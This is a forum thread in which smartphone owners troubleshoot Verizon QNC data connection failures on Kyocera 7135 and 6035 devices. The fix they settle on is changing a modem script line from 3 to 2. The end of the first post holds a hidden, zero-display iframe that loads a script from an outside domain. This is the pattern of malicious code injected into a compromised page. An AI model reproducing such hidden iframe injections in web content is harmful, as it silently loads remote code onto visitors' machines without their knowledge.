+ Reply to Thread
Results 1 to 18 of 18
  1. #1
    Registered User
    Join Date
    12-04-2002
    Posts
    52

    Okay, what just happened? Stupid Verizon

    I've been using my phone (with QNC browsing) for over a month with no problems. I showed a friend what my settings were so she could set up her 7135 and when we tried them, it wouldn't connect. So I tried mine and got "authentication failure (0x1233)"

    I called Verizon to see if there was something wrong with the network, or if I'd scrambled something in my settings, and
    a) the tech wouldn't even discuss settings; and
    b) conferenced in some sales rep who insisted I needed to buy Mobile Web.

    They wouldn't tell me why my phone has been working without this "essential" feature for the last six weeks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Do you have any VPN clients installed?
    Have you tried reseting?
    Have you tried switching to EN, then back to QNC and trying again?

  3. #3
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    Have you looked at your settings to see if they have changed. For some reason, mine changed from a "3" to a "2" in the first line a few times.

  4. #4
    Registered User
    Join Date
    12-04-2002
    Posts
    52
    Originally posted by HoTSynC
    Do you have any VPN clients installed?
    Have you tried reseting?
    Have you tried switching to EN, then back to QNC and trying again?
    VPN clients -- dont even know what those are

    resetting -- nope, but I will

    I haven't tried switching to EN, because I dont have EN. But I did get through to a more helpful Verizon rep who ran through the usual QNC setup checklist, changed from a 2 and a 0 to a 3 and a 1, got a loud busy signal out of the earpiece instead of the normal "authentication error" and decided that everything in setup was okay, and said it must be the hardware.

    So I called Kyocera, talked to a tech, and we ran through the checklist, changed some settings back from the ones the Verizon rep tried, but it still didn't work. We did set up a different network connection to test (not EN) but that wasn't any more successful. Now I get the loud busy signal through the earpiece when I try to connect to the Web. The phone works fine for regular voice calls, but the data connection wont work. It looks like there is no signal strength when I try to connect to data, but full strength for voice.

    Perhaps Verizon's QNC network got knocked offline, but their reps don't seem to know anything about that. I'll try again in a few hours.

  5. #5
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    Originally posted by Nownownow
    Perhaps Verizon's QNC network got knocked offline, but their reps don't seem to know anything about that. I'll try again in a few hours.
    That is what happened to me last week. If you haven't changed anything on your end, it might just be a VZW problem.

  6. #6
    Registered User
    Join Date
    11-02-2002
    Posts
    37
    "Have you looked at your settings to see if they have changed. For some reason, mine changed from a "3" to a "2" in the first line a few times"

    After the error you describe, I have changed the 3 to a 2 and visa versa on several occasions and it works to normalize qnc.

  7. #7
    Registered User
    Join Date
    12-04-2002
    Posts
    52
    Originally posted by dsnove2
    "Have you looked at your settings to see if they have changed. For some reason, mine changed from a "3" to a "2" in the first line a few times"

    After the error you describe, I have changed the 3 to a 2 and visa versa on several occasions and it works to normalize qnc.
    It worked! This place rules!!

    Both Kyocera and Verizon had me changing both lines of script. Just changing the top one from 3 to a 2 and leaving the bottom line alone worked.

    Thank You All!


    No thanks to Mobile Web lady at Verizon:alieneyes

  8. #8
    Registered User
    Join Date
    02-23-2003
    Posts
    21
    Originally posted by Lnoble
    Have you looked at your settings to see if they have changed. For some reason, mine changed from a "3" to a "2" in the first line a few times.
    Hi Lnoble,

    Sorry for the rookie question, but what do you mean by changing from "3" to "2" in the first line-- are you referring to the Prefs/Network option or something else? In that case, which numbers do you mean? My QNC service has been sporadic at best, and I haven't been able to figure out where the problem lies.

    Thanks,
    Rito

  9. #9
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    Originally posted by ritoroy
    Hi Lnoble,

    Sorry for the rookie question, but what do you mean by changing from "3" to "2" in the first line-- are you referring to the Prefs/Network option or something else? In that case, which numbers do you mean? My QNC service has been sporadic at best, and I haven't been able to figure out where the problem lies.

    Thanks,
    Rito
    We were all rookies at one time.
    Yes, in Prefs/Network, you go to Details and then Script. The first line is "Send: at$qcmdr=2" For some reason, mine occasionally changes to "3." 3 is for Express Network and 2 is for QNC.

  10. #10
    Registered User
    Join Date
    02-23-2003
    Posts
    21
    Originally posted by Lnoble
    We were all rookies at one time.
    Yes, in Prefs/Network, you go to Details and then Script. The first line is "Send: at$qcmdr=2" For some reason, mine occasionally changes to "3." 3 is for Express Network and 2 is for QNC.
    Thanks for your prompt reply, Lnoble.
    I had read elsewhere on the board (LLiuLess at http://www.smartphonesource.com/vbul...=&threadid=840) that the script should only have an "End:" command. I'll change it to the script suggested by you, and see if it improves connections from my 6035.
    Thanks,
    Rito

  11. #11
    Registered User
    Join Date
    08-17-2002
    Posts
    444
    Rito,

    My script does have an end command as a last line. The 3 to 2 change is only for the first line.

  12. #12
    Registered User
    Join Date
    01-19-2002
    Posts
    332
    From time to time, VZW does maintenance and you will not be able to connect. Other times, you may just have to try multiple times to connect. Let's make sure we don't trivialize data over wireless - what I mean is nothing is perfect.

  13. #13
    Converged. It didn't even hurt! tuckeyr's Avatar
    Join Date
    12-25-2002
    Location
    Phelps, WI
    Posts
    147
    This is confusing.... After reading these posts, I checked my script settings. My first line is set for "3" and I connect via qnc without problems. Does this mean I'm actually connecting to EN? (I'm not signed up for EN)
    Kyo 7135, XV 6600, XV 6700 and iPhone. Thanks to BT GPS, I even know where I stand!

  14. #14
    Registered User KLiuLess's Avatar
    Join Date
    11-15-2001
    Posts
    847
    Originally posted by ritoroy
    Thanks for your prompt reply, Lnoble.
    I had read elsewhere on the board (LLiuLess at http://www.smartphonesource.com/vbul...=&threadid=840) that the script should only have an "End:" command. I'll change it to the script suggested by you, and see if it improves connections from my 6035.
    Thanks,
    Rito
    Apparently you can't use 6035 network settings on a 7135. I only have a 6035, and having an empty script (only "End" command) works for QNC.

  15. #15
    Registered User
    Join Date
    01-27-2003
    Posts
    255
    I too have an empty script (only "End" command) on my 7135 and it works fine for connecting to QNC.

    But ... I traveled about 90 miles from home last week and could not connect to QNC. Any thoughts as to why this happened?

  16. #16
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    You were roaming?
    ~'kito
    pdaPhoneHome Moderator

  17. #17
    Registered User
    Join Date
    01-27-2003
    Posts
    255
    Well, I may have been roaming, but it was a digital signal, not analog. So what's up? And I think I was in Verizon territory - isn't the SF Bay Area Verizon?

  18. #18
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Yeah, it is Verizon Digital. I had a full digital signal the whole time I was running around SF. Dunno why you had troubles.
    ~'kito
    pdaPhoneHome Moderator

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts